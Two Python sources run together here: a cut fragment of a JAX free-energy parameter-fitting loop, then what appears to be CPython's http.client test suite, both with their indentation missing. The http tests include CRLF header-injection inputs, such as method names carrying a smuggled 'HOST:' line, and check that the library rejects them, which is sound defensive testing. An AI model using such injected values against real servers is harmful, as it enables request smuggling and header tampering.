combined_pdb_str = StringIO(Chem.MolToPDBBlock(combined_pdb))
out_file = os.path.join(args.out_dir, "epoch_"+str(epoch)+"_insertion_deletion_"+host_name+"_conf_"+str(conf_idx)+".pdb")
writer = PDBWriter(combined_pdb_str, out_file)
v0 = np.zeros_like(x0)
parent_conn, child_conn = Pipe()
parent_conns.append(parent_conn)
# writer can be None if we don't care about vis
all_args.append([x0, v0, conf_idx % num_gpus, writer, child_conn])
processes = []
for arg in all_args:
p = Process(target=sim.run_forward_and_backward, args=arg)
p.daemon = True
processes.append(p)
p.start()
all_du_dls = []
for pc in parent_conns:
du_dls = pc.recv()
all_du_dls.append(du_dls)
all_du_dls = np.array(all_du_dls)
loss_grad_fn = jax.grad(error_fn, argnums=(0,))
for du_dls in all_du_dls:
fwd = du_dls[:T//2]
bkwd = du_dls[T//2:]
plt.plot(np.log(lambda_schedule[:T//2]), fwd)
plt.plot(np.log(lambda_schedule[T//2:]), bkwd)
plt.savefig(os.path.join(args.out_dir, "epoch_"+str(epoch)+"_du_dls"))
# plt.show()
true_dG = 26.61024 # -6.36 * 4.184 * -1 (for insertion)
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---- LOSS", error)
error_grad = loss_grad_fn(all_du_dls, T, lambda_schedule, true_dG)
all_du_dl_adjoints = error_grad[0]
# send everything at once
for pc, du_dl_adjoints in zip(parent_conns, all_du_dl_adjoints):
pc.send(du_dl_adjoints)
# receive everything at once
all_dl_dps = []
for pc in parent_conns:
dl_dp = pc.recv()
all_dl_dps.append(dl_dp)
# terminate all the processes
for p in processes:
p.join()
all_dl_dps = np.array(all_dl_dps)
all_dl_dps = np.sum(all_dl_dps, axis=0)
allowed_groups = {
7: 0.5,
14: 0.5, # small_molecule charge
# 12: 1e-2, # GB atomic radii
13: 1e-2 # GB scale factor
}
filtered_grad = []
for g_idx, (g, gp) in enumerate(zip(all_dl_dps, sim.system.param_groups)):
if gp in allowed_groups:
pf = allowed_groups[gp]
filtered_grad.append(g*pf)
if g != 0:
print("derivs", g_idx, '\t group', gp, '\t', g, '\t adjusted to', g*pf, '\t old val', sim.system.params[g_idx])
else:
filtered_grad.append(0)
filtered_grad = np.array(filtered_grad)
opt_state = opt_update(epoch, filtered_grad, opt_state)
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
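# Each chunk above is encoded as "<hex size>\r\n<data>\r\n"; the terminating
# zero-size chunk, optional chunk extensions and trailers are appended by the
# individual tests using last_chunk, chunk_extension, trailers and chunked_end
# defined below.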
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
